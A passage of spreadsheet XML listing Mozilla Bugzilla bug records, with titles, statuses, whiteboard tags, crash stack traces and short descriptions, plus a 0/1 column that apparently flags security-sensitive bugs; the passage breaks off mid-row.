      </c>
      <c r="O1554" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1554" t="inlineStr">
        <is>
          <t>[sg:critical?] [landed m-c 7/12][qa-]</t>
        </is>
      </c>
      <c r="Q1554" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1554" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1554" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1554" t="n">
        <v>1</v>
      </c>
      <c r="U1554" t="n">
        <v>0</v>
      </c>
      <c r="V1554" t="n">
        <v>13</v>
      </c>
      <c r="W1554" t="inlineStr">
        <is>
          <t>Created attachment 543561
testcase
###!!! ASSERTION: frame tree not empty, but caller reported complete status: 'aSubtreeRoot-&gt;GetPrevInFlow()', file layout/base/nsLayoutUtils.cpp, line 4124
###!!! ASSERTION: frame crosses fixed continuation boundary: 'flowLength-&gt;mEndFlowOffset &gt;= GetContentEnd()', file layout/generic/nsTextFrameThebes.cpp, line 643
The first bad revision is:
changeset:   99c270809649
user:        Simon Montagu
date:        Mon Jun 27 19:30:04 2011 +0300
summary:     Don't overshoot the end of the sibling chain when copying text for bidi resolution. Bug 665837, r=roc
Security-sensitive because there related testcases trigger scarier assertions, and because the regressor was security sensitive.</t>
        </is>
      </c>
      <c r="X1554" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1555">
      <c r="A1555" t="n">
        <v>1548306</v>
      </c>
      <c r="B1555" t="inlineStr">
        <is>
          <t>2019-05-01 10:10:58 -0700</t>
        </is>
      </c>
      <c r="C1555" t="inlineStr">
        <is>
          <t>Caret character (^) not escaped for unsuffixed origins</t>
        </is>
      </c>
      <c r="D1555" t="inlineStr">
        <is>
          <t>2020-02-13 14:08:52 -0800</t>
        </is>
      </c>
      <c r="E1555" t="n">
        <v>1</v>
      </c>
      <c r="F1555" t="n">
        <v>1</v>
      </c>
      <c r="G1555" t="n">
        <v>3</v>
      </c>
      <c r="H1555" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1555" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1555" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1555" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1555" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1555" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1555" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1555" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1555" t="inlineStr">
        <is>
          <t>[necko-triaged][post-critsmash-triage][adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q1555" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1555" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1555" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T1555" t="n">
        <v>1</v>
      </c>
      <c r="U1555" t="n">
        <v>0</v>
      </c>
      <c r="V1555" t="n">
        <v>30</v>
      </c>
      <c r="W1555" t="inlineStr">
        <is>
          <t>Created attachment 9061951
testcase.html
Reduced with: m-c 20190430-90234f4c094d
Assertion failure: false (NS_SUCCEEDED(GetPrincipalFromOrigin(aOrigin, getter_AddRefs(dbgPrincipal)))), at src/extensions/cookie/nsPermissionManager.cpp:3297
```
rax = 0x000055f5f6e03e40   rdx = 0x0000000000000000
rcx = 0x00007fdedd9638fd   rbx = 0x00007fffe36394f0
rsi = 0x00007fdee8cc28b0   rdi = 0x00007fdee8cc1680
rbp = 0x00007fffe3639600   rsp = 0x00007fffe36394a0
r8 = 0x00007fdee8cc28b0    r9 = 0x00007fdee9e44740
r10 = 0x0000000000000000   r11 = 0x0000000000000000
r12 = 0x00007fffe36394c8   r13 = 0x00007fffe36394b8
r14 = 0x00000000804b000a   r15 = 0x00007fdec692c580
rip = 0x00007fded88ced64
OS|Linux|0.0.0 Linux 4.19.13-coreos #1 SMP Mon Jan 7 23:51:04 -00 2019 x86_64
CPU|amd64|family 6 model 79 stepping 1|8
GPU|||
Crash|SIGSEGV|0x0|0
0|0|libxul.so|nsPermissionManager::GetKeyForOrigin(nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt;&amp;)|hg:hg.mozilla.org/mozilla-central:extensions/cookie/nsPermissionManager.cpp:90234f4c094dcc794df28fdd464793dfe065f943|3299|0x74
0|1|libxul.so|nsPermissionManager::GetKeyForPrincipal(nsIPrincipal*, nsTSubstring&lt;char&gt;&amp;)|hg:hg.mozilla.org/mozilla-central:extensions/cookie/nsPermissionManager.cpp:90234f4c094dcc794df28fdd464793dfe065f943|3323|0xb
0|2|libxul.so|nsPermissionManager::GetAllKeysForPrincipal(nsIPrincipal*)|hg:hg.mozilla.org/mozilla-central:extensions/cookie/nsPermissionManager.cpp:90234f4c094dcc794df28fdd464793dfe065f943|3349|0xc
0|3|libxul.so|mozilla::dom::ContentParent::TransmitPermissionsForPrincipal(nsIPrincipal*)|hg:hg.mozilla.org/mozilla-central:dom/ipc/ContentParent.cpp:90234f4c094dcc794df28fdd464793dfe065f943|5377|0x5
0|4|libxul.so|mozilla::dom::ContentParent::AboutToLoadHttpFtpDocumentForChild(nsIChannel*)|hg:hg.mozilla.org/mozilla-central:dom/ipc/ContentParent.cpp:90234f4c094dcc794df28fdd464793dfe065f943|5343|0xd
0|5|libxul.so|mozilla::net::HttpChannelParent::OnStartRequest(nsIRequest*)|hg:hg.mozilla.org/mozilla-central:netwerk/protocol/http/HttpChannelParent.cpp:90234f4c094dcc794df28fdd464793dfe065f943|1354|0x18
0|6|libxul.so|mozilla::net::HttpBaseChannel::DoNotifyListener()|hg:hg.mozilla.org/mozilla-central:netwerk/protocol/http/HttpBaseChannel.cpp:90234f4c094dcc794df28fdd464793dfe065f943|3262|0x14
0|7|libxul.so|mozilla::net::HttpAsyncAborter&lt;mozilla::net::nsHttpChannel&gt;::HandleAsyncAbort()|hg:hg.mozilla.org/mozilla-central:netwerk/protocol/http/HttpBaseChannel.h:90234f4c094dcc794df28fdd464793dfe065f943|878|0x5
0|8|libxul.so|mozilla::detail::RunnableMethodImpl&lt;mozilla::net::nsHttpChannel*, void (mozilla::net::nsHttpChannel::*)(), true, (mozilla::RunnableKind)0&gt;::Run()|hg:hg.mozilla.org/mozilla-central:xpcom/threads/nsThreadUtils.h:90234f4c094dcc794df28fdd464793dfe065f943|1174|0x13
0|9|libxul.so|nsThread::ProcessNextEvent(bool, bool*)|hg:hg.mozilla.org/mozilla-central:xpcom/threads/nsThread.cpp:90234f4c094dcc794df28fdd464793dfe065f943|1180|0x15
0|10|libxul.so|NS_ProcessNextEvent(nsIThread*, bool)|hg:hg.mozilla.org/mozilla-central:xpcom/threads/nsThreadUtils.cpp:90234f4c094dcc794df28fdd464793dfe065f943|486|0x11
0|11|libxul.so|mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)|hg:hg.mozilla.org/mozilla-central:ipc/glue/MessagePump.cpp:90234f4c094dcc794df28fdd464793dfe065f943|88|0xa
0|12|libxul.so|MessageLoop::RunInternal()|hg:hg.mozilla.org/mozilla-central:ipc/chromium/src/base/message_loop.cc:90234f4c094dcc794df28fdd464793dfe065f943|315|0x17
0|13|libxul.so|MessageLoop::Run()|hg:hg.mozilla.org/mozilla-central:ipc/chromium/src/base/message_loop.cc:90234f4c094dcc794df28fdd464793dfe065f943|290|0x8
0|14|libxul.so|nsBaseAppShell::Run()|hg:hg.mozilla.org/mozilla-central:widget/nsBaseAppShell.cpp:90234f4c094dcc794df28fdd464793dfe065f943|137|0xd
0|15|libxul.so|nsAppStartup::Run()|hg:hg.mozilla.org/mozilla-central:toolkit/components/startup/nsAppStartup.cpp:90234f4c094dcc794df28fdd464793dfe065f943|276|0xe
0|16|libxul.so|XREMain::XRE_mainRun()|hg:hg.mozilla.org/mozilla-central:toolkit/xre/nsAppRunner.cpp:90234f4c094dcc794df28fdd464793dfe065f943|4554|0x11
0|17|libxul.so|XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;)|hg:hg.mozilla.org/mozilla-central:toolkit/xre/nsAppRunner.cpp:90234f4c094dcc794df28fdd464793dfe065f943|4692|0x8
0|18|libxul.so|XRE_main(int, char**, mozilla::BootstrapConfig const&amp;)|hg:hg.mozilla.org/mozilla-central:toolkit/xre/nsAppRunner.cpp:90234f4c094dcc794df28fdd464793dfe065f943|4773|0x5
0|19|firefox-bin|do_main|hg:hg.mozilla.org/mozilla-central:browser/app/nsBrowserApp.cpp:90234f4c094dcc794df28fdd464793dfe065f943|212|0x22
0|20|firefox-bin|main|hg:hg.mozilla.org/mozilla-central:browser/app/nsBrowserApp.cpp:90234f4c094dcc794df28fdd464793dfe065f943|291|0xd
0|21|libc-2.27.so||||0x21b97
0|22|firefox-bin|MOZ_ReportCrash|hg:hg.mozilla.org/mozilla-central:mfbt/Assertions.h:90234f4c094dcc794df28fdd464793dfe065f943|184|0x5
```</t>
        </is>
      </c>
      <c r="X1555" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1556">
      <c r="A1556" t="n">
        <v>970070</v>
      </c>
      <c r="B1556" t="inlineStr">
        <is>
          <t>2014-02-09 10:50:57 -0800</t>
        </is>
      </c>
      <c r="C1556" t="inlineStr">
        <is>
          <t>links not selectable/clickable after scrolling using the mouse wheel</t>
        </is>
      </c>
      <c r="D1556" t="inlineStr">
        <is>
          <t>2014-05-08 06:51:28 -0700</t>
        </is>
      </c>
      <c r="E1556" t="n">
        <v>1</v>
      </c>
      <c r="F1556" t="n">
        <v>1</v>
      </c>
      <c r="G1556" t="n">
        <v>3</v>
      </c>
      <c r="H1556" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1556" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1556" t="inlineStr">
        <is>
          <t>Panning and Zooming</t>
        </is>
      </c>
      <c r="K1556" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1556" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1556" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N1556" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1556" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1556" t="inlineStr"/>
      <c r="Q1556" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1556" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1556" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T1556" t="n">
        <v>1</v>
      </c>
      <c r="U1556" t="n">
        <v>0</v>
      </c>
      <c r="V1556" t="n">
        <v>20</v>
      </c>
      <c r="W1556" t="inlineStr">
        <is>
          <t>Firefox for Metro Nightly 2014-02-09 on Windows 8.1 Pro 64 bit
When scrolling https://support.mozilla.org/en-US/kb/how-does-phishing-and-malware-protection-work down with the mouse to the section with the heading "How do I use the Phishing and Malware Protection features?", moving the mouse over the links for the phishing and malware protection demo pages, doesn't show the hand. Scrolling up to the TOC and moving the mouse over these items will sometimes underline the "Anti-Phishing Working Group" and "Wikipedia Phishing page" further below. It seems the browser somehow gets the vertical mous position wrong.
Reproducibility: 3/3
Regression?</t>
        </is>
      </c>
      <c r="X1556" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1557">
      <c r="A1557" t="n">
        <v>1390283</v>
      </c>
      <c r="B1557" t="inlineStr">
        <is>
          <t>2017-08-14 13:21:25 -0700</t>
        </is>
      </c>
      <c r="C1557" t="inlineStr">
        <is>
          <t>Pocket Icon - Colour looks wrong</t>
        </is>
      </c>
      <c r="D1557" t="inlineStr">
        <is>
          <t>2017-08-17 10:41:25 -0700</t>
        </is>
      </c>
      <c r="E1557" t="n">
        <v>1</v>
      </c>
      <c r="F1557" t="n">
        <v>1</v>
      </c>
      <c r="G1557" t="n">
        <v>2</v>
      </c>
      <c r="H1557" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1557" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1557" t="inlineStr">
        <is>
          <t>Pocket</t>
        </is>
      </c>
      <c r="K1557" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L1557" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1557" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1557" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1557" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1557" t="inlineStr">
        <is>
          <t>[reserve-photon-animation]</t>
        </is>
      </c>
      <c r="Q1557" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1557" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1557" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1557" t="n">
        <v>1</v>
      </c>
      <c r="U1557" t="n">
        <v>0</v>
      </c>
      <c r="V1557" t="n">
        <v>5</v>
      </c>
      <c r="W1557" t="inlineStr">
        <is>
          <t>The highlight colour (red) in the Pocket animation looks wrong. Can you please verify that it's ##ef4056. 
Thanks!
Reference: https://cl.ly/3D3I1A2R0G2G</t>
        </is>
      </c>
      <c r="X1557" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1558">
      <c r="A1558" t="n">
        <v>1420296</v>
      </c>
      <c r="B1558" t="inlineStr">
        <is>
          <t>2017-11-23 14:42:23 -0800</t>
        </is>
      </c>
      <c r="C1558" t="inlineStr">
        <is>
          <t>Webextensions can access local files</t>
        </is>
      </c>
      <c r="D1558" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:14 -0800</t>
        </is>
      </c>
      <c r="E1558" t="n">
        <v>1</v>
      </c>
      <c r="F1558" t="n">
        <v>1</v>
      </c>
      <c r="G1558" t="n">
        <v>3</v>
      </c>
      <c r="H1558" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1558" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J1558" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1558" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L1558" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1558" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1558" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1558" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1558" t="inlineStr">
        <is>
          <t>webext-sec [post-critsmash-triage][adv-main74+]</t>
        </is>
      </c>
      <c r="Q1558" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1558" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1558" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T1558" t="n">
        <v>1</v>
      </c>
      <c r="U1558" t="n">
        <v>0</v>
      </c>
      <c r="V1558" t="n">
        <v>78</v>
      </c>
      <c r="W1558" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/62.0.3202.89 Chrome/62.0.3202.89 Safari/537.36
Steps to reproduce:
Try the code from this stack overflow answer at a webextension:
https://stackoverflow.com/questions/42108782/firefox-webextensions-get-local-files-content-by-path/44516256#44516256
And you'll see that it is possible to read local files without user interaction.
More information:
As far as I know this is at the moment used by Stylus and a beta version of Tampermonkey (my extension). At Tampermonkey it's necessary that the user _explicitly_ enables file access, just like it's necessary at Chrome, in order to use it. 
However, since the stack overflow answer was posted on 2017-05-13, I guess there are some more extensions that use it. That's why and since AMO currently is using a faster/automatic review I'm a little bit concerned that other extension might use it in a non-good-natured way, because the review process is unable to detect it (in opposition to Firefox's legacy API add-ons where the reviewers took account of this).
Finally, please think about implementing user-permitted file _read_ access. It's one of the most requested features of Tampermonkey.
https://bugzilla.mozilla.org/show_bug.cgi?id=1246236
https://bugzilla.mozilla.org/show_bug.cgi?id=1266960
Actual results:
It's possible to read local files without any user interaction.
Expected results:
It should (not/only after user confirmation) be possible to access local files.</t>
        </is>
      </c>
      <c r="X1558" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1559">
      <c r="A1559" t="n">
        <v>653238</v>
      </c>
      <c r="B1559" t="inlineStr">
        <is>
          <t>2011-04-27 14:03:22 -0700</t>
        </is>
      </c>
      <c r="C1559" t="inlineStr">
        <is>
          <t>nsSMILAnimationController::mDocument is suspicious</t>
        </is>
      </c>
      <c r="D1559" t="inlineStr">
        <is>
          <t>2013-12-27 14:19:46 -0800</t>
        </is>
      </c>
      <c r="E1559" t="n">
        <v>1</v>
      </c>
      <c r="F1559" t="n">
        <v>1</v>
      </c>
      <c r="G1559" t="n">
        <v>3</v>
      </c>
      <c r="H1559" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1559" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1559" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1559" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1559" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1559" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1559" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1559" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1559" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1559" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1559" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1559" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1559" t="n">
        <v>1</v>
      </c>
      <c r="U1559" t="n">
        <v>0</v>
      </c>
      <c r="V1559" t="n">
        <v>28</v>
      </c>
      <c r="W1559" t="inlineStr">
        <is>
          <t>mDocument is type nsIDocument* and once it is set to some value
it is never cleared, if I read the code correctly.
That might lead to sg:critical crashes if someone managed to
access mDocument once the object is deleted.</t>
        </is>
      </c>
      <c r="X1559" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1560">
      <c r="A1560" t="n">
        <v>1019726</v>
      </c>
      <c r="B1560" t="inlineStr">
        <is>
          <t>2014-06-03 09:53:58 -0700</t>
        </is>
      </c>
      <c r="C1560" t="inlineStr">
        <is>
          <t>Support three-character locale code for Maithili</t>
        </is>
      </c>
      <c r="D1560" t="inlineStr">
        <is>
          <t>2019-07-18 15:08:36 -0700</t>
        </is>
      </c>
      <c r="E1560" t="n">
        <v>1</v>
      </c>
      <c r="F1560" t="n">
        <v>1</v>
      </c>
      <c r="G1560" t="n">
        <v>7</v>
      </c>
      <c r="H1560" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1560" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1560" t="inlineStr">
        <is>
          <t>Android Studio and Gradle Integration</t>
        </is>
      </c>
      <c r="K1560" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1560" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1560" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1560" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1560" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1560" t="inlineStr"/>
      <c r="Q1560" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R1560" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1560" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1560" t="n">
        <v>1</v>
      </c>
      <c r="U1560" t="n">
        <v>0</v>
      </c>
      <c r="V1560" t="n">
        <v>30</v>
      </c>
      <c r="W1560" t="inlineStr">
        <is>
          <t>Forked from Bug 1013226.
This will be transparently supported by some future version of Android, but we'd like to not wait that long. We're aiming for 33, which is already a significant slip from when we would have liked this to go out.</t>
        </is>
      </c>
      <c r="X1560" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1561">
      <c r="A1561" t="n">
        <v>633957</v>
      </c>
      <c r="B1561" t="inlineStr">
        <is>
          <t>2011-02-14 07:35:57 -0800</t>
        </is>
      </c>
      <c r="C1561" t="inlineStr">
        <is>
          <t>run pre push checks twice</t>
        </is>
      </c>
      <c r="D1561" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1561" t="n">
        <v>1</v>
      </c>
      <c r="F1561" t="n">
        <v>1</v>
      </c>
      <c r="G1561" t="n">
        <v>5</v>
      </c>
      <c r="H1561" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1561" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1561" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1561" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1561" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1561" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1561" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1561" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1561" t="inlineStr"/>
      <c r="Q1561" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1561" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1561" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1561" t="n">
        <v>1</v>
      </c>
      <c r="U1561" t="n">
        <v>0</v>
      </c>
      <c r="V1561" t="n">
        <v>3</v>
      </c>
      <c r="W1561" t="inlineStr">
        <is>
          <t>We should run the pre push checks after signing. All the files are in place at that point and we could catch a lot of issues well in advance of the release. We should continue running them right before pushing to mirrors to be sure nothing has changed in the meantime.</t>
        </is>
      </c>
      <c r="X1561" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1562">
      <c r="A1562" t="n">
        <v>164307</v>
      </c>
      <c r="B1562" t="inlineStr">
        <is>
          <t>2002-08-23 12:29:07 -0700</t>
        </is>
      </c>
      <c r="C1562" t="inlineStr">
        <is>
          <t>CGI.pl not localisable</t>
        </is>
      </c>
      <c r="D1562" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E1562" t="n">
        <v>1</v>
      </c>
      <c r="F1562" t="n">
        <v>1</v>
      </c>
      <c r="G1562" t="n">
        <v>4</v>
      </c>
      <c r="H1562" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1562" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1562" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K1562" t="inlineStr">
        <is>
          <t>2.16</t>
        </is>
      </c>
      <c r="L1562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1562" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1562" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1562" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1562" t="inlineStr"/>
      <c r="Q1562" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1562" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1562" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T1562" t="n">
        <v>1</v>
      </c>
      <c r="U1562" t="n">
        <v>0</v>
      </c>
      <c r="V1562" t="n">
        <v>10</v>
      </c>
      <c r="W1562" t="inlineStr">
        <is>
          <t>CGI.pl uses fixed strings for the UI, such as the prompt that it needs a 
legitimate e-mail address and password to continue, and the labeling of the E-
mail address and Password fields.  These should be templatized.</t>
        </is>
      </c>
      <c r="X1562" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1563">
      <c r="A1563" t="n">
        <v>1197012</v>
      </c>
      <c r="B1563" t="inlineStr">
        <is>
          <t>2015-08-20 17:01:28 -0700</t>
        </is>
      </c>
      <c r="C1563" t="inlineStr">
        <is>
          <t>crash in nsAString_internal::Assign(nsAString_internal const&amp;, mozilla::fallible_t const&amp;) | nsAString_internal::Assign(nsAString_internal const&amp;) | mozilla::ErrorResult::ThrowErrorWithMessage(__va_list_tag*, mozilla::dom::ErrNum, nsresult)</t>
        </is>
      </c>
      <c r="D1563" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1563" t="n">
        <v>1</v>
      </c>
      <c r="F1563" t="n">
        <v>1</v>
      </c>
      <c r="G1563" t="n">
        <v>3</v>
      </c>
      <c r="H1563" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1563" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1563" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1563" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1563" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1563" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1563" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1563" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1563" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main43+]</t>
        </is>
      </c>
      <c r="Q1563" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1563" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1563" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1563" t="n">
        <v>1</v>
      </c>
      <c r="U1563" t="n">
        <v>0</v>
      </c>
      <c r="V1563" t="n">
        <v>15</v>
      </c>
      <c r="W1563" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-123cedd1-aed8-4e77-86b9-9bfc82150820.
=============================================================
Fresh profile, opened https://johnme-gcm.appspot.com/chat/
- Signed in
- Closed tab
- Received a push notification
- Opened tab
- Refresh
- Waited
- Un-focus the window to do something else
- Crash</t>
        </is>
      </c>
      <c r="X1563" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1564">
      <c r="A1564" t="n">
        <v>1839079</v>
      </c>
      <c r="B1564" t="inlineStr">
        <is>
          <t>2023-06-18 11:25:22 -0700</t>
        </is>
      </c>
      <c r="C1564" t="inlineStr">
        <is>
          <t>New Update Hide Full Screen Popup Ui Windows with mailto: link</t>
        </is>
      </c>
      <c r="D1564" t="inlineStr">
        <is>
          <t>2024-05-30 11:11:15 -0700</t>
        </is>
      </c>
      <c r="E1564" t="n">
        <v>1</v>
      </c>
      <c r="F1564" t="n">
        <v>1</v>
      </c>
      <c r="G1564" t="n">
        <v>3</v>
      </c>
      <c r="H1564" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1564" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1564" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1564" t="inlineStr">
        <is>
          <t>Firefox 115</t>
        </is>
      </c>
      <c r="L1564" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1564" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1564" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1564" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1564" t="inlineStr">
        <is>
          <t>[adv-main116+] [adv-esr115.2+]</t>
        </is>
      </c>
      <c r="Q1564" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1564" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1564" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T1564" t="n">
        <v>1</v>
      </c>
      <c r="U1564" t="n">
        <v>0</v>
      </c>
      <c r="V1564" t="n">
        <v>40</v>
      </c>
      <c r="W1564" t="inlineStr">
        <is>
          <t>Created attachment 9339755
Puf POC Firefox.mp4
Steps to reproduce:
OS: Windows 10
